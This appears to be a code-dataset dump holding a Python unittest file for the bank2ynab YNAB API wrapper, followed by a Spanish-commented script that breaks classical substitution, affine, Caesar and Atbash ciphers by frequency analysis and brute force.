self.TEMPCONFPATH = join(
get_project_dir(), "test-data", "temp-test.conf"
)
self.cp = get_test_confparser()
self.defaults = dict(self.cp.defaults())
self.test_class = None
# copy config file to temp location
copyfile(self.TESTCONFPATH, self.TEMPCONFPATH)
def tearDown(self):
# delete temp config file
if os.path.exists(self.TEMPCONFPATH):
os.remove(self.TEMPCONFPATH)
def test_init_and_name(self): # todo
""" Check parameters are correctly stored in the API object."""
"""
self.test_class = YNAB_API(self.defaults)
cfe = copy(self.defaults)
self.assertEqual(self.test_class.config, cfe)
self.assertEqual("DEFAULT", self.test_class.name)
"""
"""
def __init__(self, config_object, transactions=None):
self.transactions = []
self.account_ids = []
self.config = configparser.RawConfigParser()
self.config.read("user_configuration.conf")
self.api_token = self.config.get("DEFAULT", "YNAB API Access Token")
self.budget_id = None
"""
def test_run(self): # todo
"""
if self.api_token is not None:
logging.info("Connecting to YNAB API...")
# check for API token auth (and other errors)
error_code = self.list_budgets()
if error_code[0] == "ERROR":
return error_code
else:
# generate our list of budgets
budget_ids = self.list_budgets()
# if there's only one budget, silently set a default budget
if len(budget_ids) == 1:
self.budget_id = budget_ids[0]
budget_t_data = self.process_transactions(transaction_data)
for budget in budget_ids:
if budget_t_data[budget]["transactions"] != []:
self.post_transactions(budget_t_data[budget])
else:
logging.info("No API-token provided.")
"""
def test_api_read(self): # todo
"""
def api_read(self, budget, kwd):
General function for reading data from YNAB API
:param budget: boolean indicating if there's a default budget
:param kwd: keyword for data type, e.g. transactions
:return error_codes: if it fails we return our error
id = self.budget_id
api_t = self.api_token
base_url = "https://api.youneedabudget.com/v1/budgets/"
if budget is False:
# only happens when we're looking for the list of budgets
url = base_url + "?access_token={}".format(api_t)
else:
url = base_url + "{}/{}?access_token={}".format(id, kwd, api_t)
response = requests.get(url)
try:
read_data = response.json()["data"][kwd]
except KeyError:
# the API has returned an error so let's handle it
return self.process_api_response(response.json()["error"])
return read_data
"""
def test_process_transactions(self): # todo
"""
:param transaction_data: dictionary of bank names to transaction lists
logging.info("Processing transactions...")
# go through each bank's data
transactions = []
for bank in transaction_data:
# choose what account to write this bank's transactions to
account_id = self.select_account(bank)
# save transaction data for each bank in main dict
account_transactions = transaction_data[bank]
for t in account_transactions[1:]:
trans_dict = self.create_transaction(
account_id, t, transactions)
transactions.append(trans_dict)
# compile our data to post
data = {
"transactions": transactions
}
return data
"""
def test_create_transaction(self):
test_class = YNAB_API(self.cp)
test_transactions = [
(
["2019-01-01", "Mimsy", "Category", "Memo", 400, 0],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": -400000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-400000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Mimsy", "Category", "Memo", 400, ""],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": -400000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-400000:2019-01-01:2",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Mimsy", "Category", "Memo", "", 500],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": 500000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:500000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Borogrove", "Category", "Memo", 600, ""],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Borogrove",
"amount": -600000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-600000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
]
transactions = []
for test_row, target_transaction in test_transactions:
test_transaction = test_class.create_transaction(
"account_id", test_row, transactions
)
transactions.append(test_transaction)
for key in test_transaction:
self.assertEqual(
target_transaction[key], test_transaction[key]
)
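    # Sketch of the amount conversion exercised above (assumption: this
    # mirrors create_transaction; the helper is illustrative, not part of
    # bank2ynab). Rows are [date, payee, category, memo, outflow, inflow];
    # YNAB amounts are integer milliunits, negative for outflows.
    @staticmethod
    def _milliunits_demo(outflow, inflow):
        if outflow not in ("", 0):
            return int(-1000 * outflow)
        return int(1000 * inflow)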
def test_create_import_id(self):
test_class = YNAB_API(self.cp)
test_values = [
(100, "2019-01-01", "YNAB:100:2019-01-01:1"), # no duplicate
(200, "2019-01-01", "YNAB:200:2019-01-01:2"), # 1 duplicate
(300, "2019-01-01", "YNAB:300:2019-01-01:3"), # 2 duplicates
(400, "2019-01-01", "YNAB:400:2019-01-01:1"), # no duplicate
(500, "2019-01-01", "YNAB:500:2019-01-01:1"), # no duplicate
(600, "2019-01-01", "YNAB:600:2019-01-01:2"), # 1 duplicate
]
test_transactions = [
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 200,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:200:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 300,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:300:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 300,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:300:2019-01-01:2",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 600,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:600:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
]
for amount, date, target_id in test_values:
id = test_class.create_import_id(amount, date, test_transactions)
self.assertEqual(id, target_id)
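    # Sketch of the import-id scheme asserted above (assumption: matches
    # create_import_id; illustrative only): ids look like
    # "YNAB:{amount}:{date}:{occurrence}", where occurrence is a 1-based
    # count of earlier transactions sharing the same amount and date.
    @staticmethod
    def _import_id_demo(amount, date, existing):
        prefix = "YNAB:{}:{}:".format(amount, date)
        occurrence = 1 + sum(
            1 for t in existing if t["import_id"].startswith(prefix)
        )
        return prefix + str(occurrence)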
def test_post_transactions(self): # todo
"""
def post_transactions(self, budget_id, data):
# send our data to API
logging.info("Uploading transactions to YNAB...")
url = ("https://api.youneedabudget.com/v1/budgets/" +
"{}/transactions?access_token={}".format(
budget_id,
self.api_token))
post_response = requests.post(url, json=data)
# response handling - TODO: make this more thorough!
try:
self.process_api_response(json.loads(post_response.text)["error"])
except KeyError:
logging.info("Success!")
"""
def test_list_transactions(self): # todo
"""
def list_transactions(self):
transactions = self.api_read(True, "transactions")
if transactions[0] == "ERROR":
return transactions
if len(transactions) > 0:
logging.debug("Listing transactions:")
for t in transactions:
logging.debug(t)
else:
logging.debug("no transactions found")
"""
def test_list_accounts(self): # todo
"""
def list_accounts(self):
accounts = self.api_read(True, "accounts")
if accounts[0] == "ERROR":
return accounts
account_ids = list()
if len(accounts) > 0:
for account in accounts:
account_ids.append([account["name"], account["id"]])
# debug messages
logging.debug("id: {}".format(account["id"]))
logging.debug("on_budget: {}".format(account["on_budget"]))
logging.debug("closed: {}".format(account["closed"]))
else:
logging.info("no accounts found")
return account_ids
"""
def test_list_budgets(self): # todo
"""
def list_budgets(self):
budgets = self.api_read(False, "budgets")
if budgets[0] == "ERROR":
return budgets
budget_ids = list()
for budget in budgets:
budget_ids.append([budget["name"], budget["id"]])
commented out because this is a bit messy and confusing
# TODO: make this legible!
# debug messages:
# for key, value in budget.items():
if(type(value) is dict):
logging.debug("%s: " % str(key))
for subkey, subvalue in value.items():
logging.debug(" %s: %s" %
(str(subkey), str(subvalue)))
else:
logging.debug("%s: %s" % (str(key), str(value)))
return budget_ids
"""
def test_process_api_response(self): # todo
"""
def process_api_response(self, details):
Prints details about errors returned by the YNAB api
:param details: dictionary of returned error info from the YNAB api
:return id: HTTP error ID
:return detail: human-understandable explanation of error
# TODO: make this function into a general response handler instead
errors = {
"400": "Bad syntax or validation error",
"401": "API access token missing, invalid,
revoked, or expired",
"403.1": "The subscription for this account has lapsed.",
"403.2": "The trial for this account has expired.",
"404.1": "The specified URI does not exist.",
"404.2": "Resource not found",
"409": "Conflict error",
"429": "Too many requests. Wait a while and try again.",
"500": "Unexpected error"
}
id = details["id"]
name = details["name"]
detail = errors[id]
logging.error("{} - {} ({})".format(id, detail, name))
return ["ERROR", id, detail]
"""
@patch("b2y_utilities.option_selection")
@patch.object(YNAB_API, "list_accounts")
def test_select_account(self, mock_list_acs, mock_option_sel):
"""
Test account selection logic
"""
test_class = YNAB_API(self.cp)
test_banks = [
("test_api_existing_bank", "Test Budget ID 1", "Test Account ID"),
("New Bank", "Test Budget ID 2", "ID #2"),
]
test_class.config_path = self.TEMPCONFPATH
test_class.config = configparser.RawConfigParser()
test_class.config.read(test_class.config_path)
mock_ids = [
("Account 1", "Test Budget ID 1", "ID #1"),
("Account 2", "Test Budget ID 2", "ID #2"),
("Account 3", "Test Budget ID 1", "ID #3"),
]
mock_list_acs.return_value = mock_ids
mock_option_sel.side_effect = ["Test Budget ID 2", "ID #2"]
for bank, budget_id, ac_id in test_banks:
b_id, a_id = test_class.select_account(bank)
self.assertEqual(b_id, budget_id)
self.assertEqual(a_id, ac_id)
def test_save_account_selection(self):
"""
Test that account info is saved under the correct bank and
in the correct file.
"""
test_class = YNAB_API(self.cp)
test_budget_id = "Test Budget ID"
test_account_id = "Test Account ID"
test_banks = ["New Bank", "Existing Bank"]
test_class.config_path = self.TEMPCONFPATH
test_class.config = configparser.RawConfigParser()
test_class.config.read(test_class.config_path)
# save test bank details to test config
for test_bank in test_banks:
test_class.save_account_selection(
test_bank, test_budget_id, test_account_id
)
# check test config for test bank details & make sure ID matches
config = configparser.RawConfigParser()
config.read(test_class.user_config_path)
for test_bank in test_banks:
test_id = config.get(test_bank, "YNAB Account ID")
self.assertEqual(
test_id, "{}||{}".format(test_budget_id, test_account_id)
)
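    # The stored value checked above is "budget_id||account_id"; a minimal
    # parsing sketch (illustrative, not part of bank2ynab):
    @staticmethod
    def _split_account_id(raw):
        budget_id, _, account_id = raw.partition("||")
        return budget_id, account_id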
| 36.837363
| 82
| 0.499672
|
from unittest import TestCase
from unittest.mock import patch
from os.path import join
import os
from shutil import copyfile
import configparser
from test.utils import get_test_confparser, get_project_dir
from bank2ynab.b2y_utilities import (
get_configs,
string_num_diff,
get_config_line,
option_selection,
)
from bank2ynab.ynab_api import YNAB_API
class Test_YNAB_API(TestCase):
def setUp(self):
self.TESTCONFPATH = join(get_project_dir(), "test-data", "test.conf")
self.TEMPCONFPATH = join(
get_project_dir(), "test-data", "temp-test.conf"
)
self.cp = get_test_confparser()
self.defaults = dict(self.cp.defaults())
self.test_class = None
copyfile(self.TESTCONFPATH, self.TEMPCONFPATH)
def tearDown(self):
if os.path.exists(self.TEMPCONFPATH):
os.remove(self.TEMPCONFPATH)
    def test_init_and_name(self):
        pass
    def test_run(self):
        pass
    def test_api_read(self):
        pass
    def test_process_transactions(self):
        pass
def test_create_transaction(self):
test_class = YNAB_API(self.cp)
test_transactions = [
(
["2019-01-01", "Mimsy", "Category", "Memo", 400, 0],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": -400000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-400000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Mimsy", "Category", "Memo", 400, ""],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": -400000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-400000:2019-01-01:2",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Mimsy", "Category", "Memo", "", 500],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": 500000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:500000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Borogrove", "Category", "Memo", 600, ""],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Borogrove",
"amount": -600000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-600000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
]
transactions = []
for test_row, target_transaction in test_transactions:
test_transaction = test_class.create_transaction(
"account_id", test_row, transactions
)
transactions.append(test_transaction)
for key in test_transaction:
self.assertEqual(
target_transaction[key], test_transaction[key]
)
def test_create_import_id(self):
test_class = YNAB_API(self.cp)
test_values = [
(100, "2019-01-01", "YNAB:100:2019-01-01:1"),
(200, "2019-01-01", "YNAB:200:2019-01-01:2"),
(300, "2019-01-01", "YNAB:300:2019-01-01:3"),
(400, "2019-01-01", "YNAB:400:2019-01-01:1"),
(500, "2019-01-01", "YNAB:500:2019-01-01:1"),
(600, "2019-01-01", "YNAB:600:2019-01-01:2"),
]
test_transactions = [
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 200,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:200:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 300,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:300:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 300,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:300:2019-01-01:2",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 600,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:600:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
]
for amount, date, target_id in test_values:
id = test_class.create_import_id(amount, date, test_transactions)
self.assertEqual(id, target_id)
    def test_post_transactions(self):
        pass
    def test_list_transactions(self):
        pass
    def test_list_accounts(self):
        pass
    def test_list_budgets(self):
        pass
    def test_process_api_response(self):
        pass
@patch("b2y_utilities.option_selection")
@patch.object(YNAB_API, "list_accounts")
def test_select_account(self, mock_list_acs, mock_option_sel):
test_class = YNAB_API(self.cp)
test_banks = [
("test_api_existing_bank", "Test Budget ID 1", "Test Account ID"),
("New Bank", "Test Budget ID 2", "ID #2"),
]
test_class.config_path = self.TEMPCONFPATH
test_class.config = configparser.RawConfigParser()
test_class.config.read(test_class.config_path)
mock_ids = [
("Account 1", "Test Budget ID 1", "ID #1"),
("Account 2", "Test Budget ID 2", "ID #2"),
("Account 3", "Test Budget ID 1", "ID #3"),
]
mock_list_acs.return_value = mock_ids
mock_option_sel.side_effect = ["Test Budget ID 2", "ID #2"]
for bank, budget_id, ac_id in test_banks:
b_id, a_id = test_class.select_account(bank)
self.assertEqual(b_id, budget_id)
self.assertEqual(a_id, ac_id)
def test_save_account_selection(self):
test_class = YNAB_API(self.cp)
test_budget_id = "Test Budget ID"
test_account_id = "Test Account ID"
test_banks = ["New Bank", "Existing Bank"]
test_class.config_path = self.TEMPCONFPATH
test_class.config = configparser.RawConfigParser()
test_class.config.read(test_class.config_path)
for test_bank in test_banks:
test_class.save_account_selection(
test_bank, test_budget_id, test_account_id
)
config = configparser.RawConfigParser()
config.read(test_class.user_config_path)
for test_bank in test_banks:
test_id = config.get(test_bank, "YNAB Account ID")
self.assertEqual(
test_id, "{}||{}".format(test_budget_id, test_account_id)
)
| true
| true
|
1c40dc425318deef0d4cb09f150ed1883e6fefef
| 12,187
|
py
|
Python
|
uem/criptoanalisis/mono.py
|
junquera/my-crypto-works
|
8ef1b207a97fd5ee7eb53f985edc73813a0f8fc0
|
[
"MIT"
] | null | null | null |
uem/criptoanalisis/mono.py
|
junquera/my-crypto-works
|
8ef1b207a97fd5ee7eb53f985edc73813a0f8fc0
|
[
"MIT"
] | null | null | null |
uem/criptoanalisis/mono.py
|
junquera/my-crypto-works
|
8ef1b207a97fd5ee7eb53f985edc73813a0f8fc0
|
[
"MIT"
] | 1
|
2018-07-16T22:03:44.000Z
|
2018-07-16T22:03:44.000Z
|
#!/bin/env python3
'''
[ STATISTICAL ANALYSIS OF TEXT ]
[ MONOALPHABETIC SUBSTITUTION CIPHER ]
Javier Junquera Sánchez <javier@junquera.xyz>
Phases:
1. Entropy analysis
2. Character frequency analysis
3. Analysis of repeated adjacent characters (RR, LL)
4. Analysis of repeated digraphs
5. Generation of candidate translations based on language statistics
6. Use of the statistics for the affine cipher
7. Affine, Caesar and Atbash brute force
'''
import re
from affine import decode_affine, affine_break
# BASED ON DON QUIXOTE
estadisticas_castellano = {'A': 0.1203914356874436, 'B': 0.015130070791165134, 'C': 0.03719184102245509, 'D': 0.05437026585244542, 'E': 0.1386395633977034, 'F': 0.004934755557097172, 'G': 0.01092558720618012, 'H': 0.012658047516610746, 'I': 0.048772133465719646, 'J': 0.006582358140488471, 'K': 8.238012916956494e-05, 'L': 0.05551801306561237, 'M': 0.02788784162203377, 'N': 0.06781866708951004, 'O': 0.09582667220822723, 'P': 0.022245112473652295, 'Q': 0.02013110209127842, 'R': 0.06325617061234451, 'S': 0.07834783863652835, 'T': 0.03919621769909202, 'U': 0.048757887277968516, 'V': 0.011134324826707514, 'W': 0.00016847665514377192, 'X': 0.00025209558324821755, 'Y': 0.015759380650084517, 'Z': 0.004021760742090114}
estadisticas_castellano_esp = {' ': 1, 'A': 0.1203914356874436, 'B': 0.015130070791165134, 'C': 0.03719184102245509, 'D': 0.05437026585244542, 'E': 0.1386395633977034, 'F': 0.004934755557097172, 'G': 0.01092558720618012, 'H': 0.012658047516610746, 'I': 0.048772133465719646, 'J': 0.006582358140488471, 'K': 8.238012916956494e-05, 'L': 0.05551801306561237, 'M': 0.02788784162203377, 'N': 0.06781866708951004, 'O': 0.09582667220822723, 'P': 0.022245112473652295, 'Q': 0.02013110209127842, 'R': 0.06325617061234451, 'S': 0.07834783863652835, 'T': 0.03919621769909202, 'U': 0.048757887277968516, 'V': 0.011134324826707514, 'W': 0.00016847665514377192, 'X': 0.00025209558324821755, 'Y': 0.015759380650084517, 'Z': 0.004021760742090114}
# estadisticas_castellano = estadisticas_castellano_esp
# BASED ON THE LORD OF THE RINGS
estadisticas_ingles = {'A': 0.0831295411584481, 'B': 0.01738984496652256, 'C': 0.017155136950865266, 'D': 0.052443360917834525, 'E': 0.12285071813081565, 'F': 0.024581248091420035, 'G': 0.02449291711778557, 'H': 0.06476679361089449, 'I': 0.06393143497452282, 'J': 0.0006511254627912083, 'K': 0.009077900347519288, 'L': 0.04530117076396197, 'M': 0.022928197013403595, 'N': 0.06837322107728455, 'O': 0.0779066568745473, 'P': 0.013705181494913397, 'Q': 0.00058677003914324, 'R': 0.05933696247447866, 'S': 0.05987073392944122, 'T': 0.08989443186779629, 'U': 0.02559074493295679, 'V': 0.008983260018625218, 'W': 0.026715072040218356, 'X': 0.000682672239089232, 'Y': 0.019290222770715505, 'Z': 0.00036468073400515346}
with open('t.txt') as f:
t = f.read().replace(' ', '').replace('\n', '')
KEYWORDS = ['CRIP', 'CUANDO', 'EN', 'HA', 'HABIA', 'ERA', 'CONTRA', 'DESDE', 'SOLO', 'PERO', 'LE', 'SI', 'ESTA', 'AHORA', 'ALLI', 'SE', 'SEGUN', 'ANTE', 'SER', 'EL', 'POR', 'PARA', 'TAMBIEN', 'TODO', 'SUS', 'PORQUE', 'AQUI', 'YA', 'HACIA', 'A', 'CON', 'HAN', 'DEL', 'Y', 'AL', 'COMO', 'HASTA', 'QUE', 'O', 'UN', 'BAJO', 'LO', 'MAS', 'SU', 'LOS', 'SIN', 'NO', 'PUEDE', 'DOS', 'ENTRE', 'SOBRE', 'CIFR', 'MI', 'FUE', 'MUY', 'TRAS', 'LAS', 'LA', 'ES', 'SON', 'VEZ', 'ME', 'CABE', 'YO', 'HAY', 'ESTE', 'UNA', 'AÑOS', 'DE']
KEYWORDS_EN = list(set(['THE', 'IS', 'AND', 'WHO', 'HE', 'IT', 'WHERE', 'CRYPT', 'A']))
class Descifrado():
def __init__(self, text, key):
self.text = text
self.key = key
def __str__(self):
return "[%s] %s" % (self.key, self.text)
MAX = 5
def analiza_repetidos(t, i=2):
t = re.sub(r'[^A-Z]', '', t.upper())
res = {}
for j in range(len(t)):
ocur = t[j:j+i]
if len(ocur) < i:
continue
last = t[j:].find(ocur)
while last >= 0:
if ocur in res:
res[ocur].append(j+last)
else:
res[ocur] = [j+last]
n = t[j+last+1:].find(ocur)
if n >= 0:
last += n + 1
else:
last = -1
for x in res:
val = list(set(res[x]))
val.sort()
res[x] = val
return res
def calcula_distancias(v):
dist = []
for x in range(len(v))[1:]:
dist.append(v[x] - v[x-1])
return dist
def divisores(x):
res = []
for i in range(int(x/2))[2:]:
if x % i == 0:
res.append(i)
return res
def analisis_estadistico(txt):
txt = re.sub(r'[^A-Z]', '', txt.upper())
d = {chr(c + ord('A')): 0 for c in range(ord('Z') - ord('A') + 1)}
for x in txt:
if x in d:
d[x] += 1
else:
d[x] = 1
return {x: float(d[x])/len(txt) for x in d}
def gen_keys(cs, n, key):
if len(key) == len(cs):
return [key]
keys = []
for c in cs[n]:
keys += gen_keys(cs, n+1, key + c)
return keys
from math import gcd
def comun_divisor(values):
res = values[0]
for v in values[1:]:
aux = gcd(res, v)
if aux <= 2:
return res
res = aux
return res
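# Minimal sketch (illustrative, built only from the helpers above): a
# Kasiski-style key-length guess takes the positions of a repeated n-gram,
# turns them into gaps with calcula_distancias, and reduces the gaps with
# comun_divisor.
def estima_longitud_clave(texto, n=3):
    repeticiones = analiza_repetidos(texto, i=n)
    candidatos = []
    for posiciones in repeticiones.values():
        if len(posiciones) > 1:
            candidatos.append(comun_divisor(calcula_distancias(posiciones)))
    return candidatos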
def repetidos(t):
res = {}
for x in range(len(t) - 1):
if t[x] == t[x+1]:
c = t[x:x+1]
if c in res:
res[c].append(x)
else:
res[c] = [x]
return res
def representa_matrix(t, n=10):
res = ""
for i in range(len(t)):
if i % n == 0 and i > 0:
res += "\n"
res += "%c " % t[i]
return res
def translate(t, translations, n=1):
res = ""
while len(t):
c = t[:n]
t = t[n:]
res += translations.get(c, " ")
return res
def gen_translations(translations, translation):
translation_aux = {k: translation[k] for k in translation}
if len(translations) == 0:
r = translate(t, translation, n=n_gram)
trans_res.append(Descifrado(r, translation))
return
ts = translations.keys()
for i in ts:
ts_values = translations[i]
for j in ts_values:
# print(it)
# input(ts_values)
# input(j)
translation_aux[i] = j
# input(translations)
next = {k: translations[k] for k in translations if k!=i}
# input(next)
gen_translations(next, translation_aux)
break
english = False
def most_able(candidates, KEYWORDS=[]):
res = {}
for c in candidates:
kws = 0
for keyword in KEYWORDS:
if keyword in c.text:
kws += 1
if english:
for keyword in KEYWORDS_EN:
if keyword in c.text:
kws += 1
res[c] = kws
return {x[0]: x[1] for x in sorted(res.items(), key=lambda x: (x[1],x[0].text))[::-1]}
from entro import entropy
# Text entropy
e = entropy(t)
# Statistical analysis of the characters in the text
multigram = False
if multigram:
print("ANÁLISIS POLIALFABÉTICO")
n_gram = int(input("Ngram > "))
else:
print("- ANÁLISIS MONOALFABÉTICO:")
n_gram = 1
ar = analiza_repetidos(t, i=n_gram)
d = {x: len(ar[x]) for x in ar}
estadisticas = {x[0]: x[1] for x in sorted(d.items(), key=lambda x: (x[1],x[0]))[::-1]}
conv_estadisticas_es = {x[0]: x[1] for x in sorted(estadisticas_castellano.items(), key=lambda x: (x[1],x[0]))[::-1]}
conv_estadisticas_en = {x[0]: x[1] for x in sorted(estadisticas_ingles.items(), key=lambda x: (x[1],x[0]))[::-1]}
r_std = [v for i, v in enumerate(estadisticas)]
r_mix_es = [v for i, v in enumerate(conv_estadisticas_es)]
r_mix_en = [v for i, v in enumerate(conv_estadisticas_en)]
# Table of candidate translations
translations = {r_std[i]: [r_mix_es[i]] for i in range(min(len(r_std), len(r_mix_es)))}
if english:
for i in range(min(len(r_std), len(r_mix_en))):
c = r_mix_en[i]
tr = r_std[i]
if c in translations:
translations[tr].append(c)
else:
translations[tr] = [c]
# Identical adjacent characters may be LL or RR
rep = repetidos(t)
add_rep = True and (n_gram == 1)
if add_rep:
for d in rep:
translations[d].append('L')
translations[d].append('R')
# Distinct repeated adjacent pairs may be CH
dup = analiza_repetidos(t, i=2)
add_dup = False and (n_gram == 1)
if add_dup:
for r in dup:
translations[r[0]].append('C')
translations[r[1]].append('H')
# Matrix representation
mat = representa_matrix(t, n=20)
def unifica(translations):
for x in translations:
translations[x] = list(set(translations[x]))
return translations
translations = unifica(translations)
print()
print("[*] Mensaje:")
print(t)
print()
print("[*] Entropía: %f" % e)
print()
print("[*] Estadísticas:")
print(estadisticas)
print()
print("[*] Repetidos (RR, LL):")
print(rep)
print()
print("[*] Parejas repetidas:")
print(dup)
print()
print("[*] Matriz:")
print(mat)
print()
print("[*] Traducciones")
print(translations)
claves = 1
for i in translations:
v = translations[i]
claves *= len(v) if len(v) > 0 else 1
print()
print("[*] Claves posibles: %d" % claves)
# Translation results
trans_res = []
gen_translations(translations, {})
'''
AFFINE ANALYSIS
C = ord('C') - ord('A')
D = ord('D') - ord('A')
L = ord('L') - ord('A')
A = ord('A') - ord('A')
# (a * L) + b = C
# (a * A) + b = D
# b = D - (a * A)
# (a * L) + D - (a * A) = C
# a * (L - A) = C - D
# a = (C - D) * (L - A)**(-1)
a = ( inverso(L - A, l) * (C - D) ) % l
# a = 7
b = ( D - (a * A) )
# b = 3
'''
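# A runnable version of the algebra sketched above (assumptions: 26-letter
# alphabet and Python 3.8+ for pow(x, -1, m); this helper is illustrative
# and separate from affine_break):
def _clave_afin(p1, p2, c1, c2, m=26):
    # Solve a*p1 + b = c1 and a*p2 + b = c2 (mod m) for the key (a, b).
    a = ((c1 - c2) * pow(p1 - p2, -1, m)) % m
    b = (c1 - a * p1) % m
    return a, b
# Example from the comment above: L->C and A->D give a=7, b=3.
assert _clave_afin(11, 0, 2, 3) == (7, 3)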
stat = most_able(trans_res, KEYWORDS=KEYWORDS)
affine_values = dict(a=[], b=[])
print()
print('-[CODEBOOK BY CRYPTOANALYSIS]')
n_best = 3
for k in stat:
if n_best:
m = k.text
print("[%d] %s" % (stat[k], k))
broken = affine_break(m[0], m[1], t[0], t[1])
affine_values['a'].append(broken['a'])
affine_values['b'].append(broken['b'])
else:
break
n_best -= 1
affine_values['a'] = list(set(affine_values['a']))
affine_values['b'] = list(set(affine_values['b']))
affines = []
for a in affine_values['a']:
for b in affine_values['b']:
aux = decode_affine(t, a, b)
        affines.append(Descifrado(aux, dict(a=a, b=b)))  # label with the key actually used
print()
print('-[AFFINE BY CRYPTOANALYSIS]')
n_best = 3
for x in most_able(affines, KEYWORDS=KEYWORDS):
if n_best:
print("%s" % x)
else:
break
n_best -= 1
others = True
if others:
'''
AFFINE ANALYSIS MANUAL
C = ord('C') - ord('A')
D = ord('D') - ord('A')
L = ord('L') - ord('A')
A = ord('A') - ord('A')
# (a * L) + b = C
# (a * A) + b = D
# b = D - (a * A)
# (a * L) + D - (a * A) = C
# a * (L - A) = C - D
# a = (C - D) * (L - A)**(-1)
a = ( inverso(L - A, l) * (C - D) ) % l
# a = 7
b = ( D - (a * A) )
# b = 3
'''
print()
print("-[AFFINE BRUTEFORCE]")
affines = []
for i in range(26):
for j in range(26):
aux = decode_affine(t, i, j)
# input("%d %d %s" % (i, j, aux))
affines.append(Descifrado(aux, dict(a=i, b=j)))
n_best = 3
for x in most_able(affines, KEYWORDS=KEYWORDS):
if n_best:
print("%s" % x)
else:
break
n_best -= 1
# CESAR ANALYSIS
from cesar import cesar
print()
print("-[CESAR BRUTEFORCE]")
cesars = []
for i in range(26):  # all 26 rotations (0 is the identity)
cesars.append(Descifrado(cesar(i, t), dict(rot=i)))
stat = most_able(cesars, KEYWORDS=KEYWORDS)
n_best = 3
for k in stat:
if n_best:
print("%s" % (k))
else:
break
n_best -= 1
print()
print("-[ATBASH]")
letras = [chr(x + ord('A')) for x in range(ord('Z') - ord('A') + 1)]
atbash_code = letras[::-1]
def atbash(t):
res = ""
for x in t:
res += atbash_code[letras.index(x)]
return res
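# Quick self-check of the mirror mapping (A<->Z, B<->Y, ...):
assert atbash("ABZ") == "ZYA"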
print("%s" % atbash(t))
| 28.474299
| 730
| 0.562485
|
import re
from affine import decode_affine, affine_break
